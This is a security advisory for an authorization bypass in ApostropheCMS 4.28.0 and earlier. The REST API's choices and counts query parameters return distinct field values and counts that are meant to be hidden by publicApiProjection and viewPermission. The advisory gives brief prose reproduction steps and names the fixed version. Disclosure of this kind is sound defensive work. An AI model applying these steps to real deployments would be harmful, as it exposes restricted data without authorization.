ApostropheCMS Authorization Bypass Vulnerability in REST API Choices and Counts Query Parameters

A vulnerability allowing authorization bypass has been identified in ApostropheCMS versions 4.28.0 and prior. This issue arises in the choices and counts query parameters of the REST API, where the query builders execute MongoDB distinct operations that circumvent the publicApiProjection restrictions designed to limit exposed fields. The vulnerability allows unauthenticated users to access all distinct values for any schema field type with a registered query builder, including sensitive data if stored in certain fields. The issue also affects fields protected by viewPermission, with the counts variant disclosing document statistics for each distinct value.

Impact

Exploitation of this vulnerability leads to unauthorized access to distinct field values, including those protected by viewPermission, and statistical data about the dataset, through the choices and counts query parameters of the REST API.

Reproduction

To reproduce this vulnerability, send a request to the ApostropheCMS REST API v1 with the choices or counts query parameter. If the targeted piece type has publicApiProjection restrictions and the field is not included in the projection, the distinct values will be returned, bypassing the intended access controls. This can be done using a tool like curl or Postman.

Remediation

Users can update to ApostropheCMS version 4.29.0, where this vulnerability has been fixed.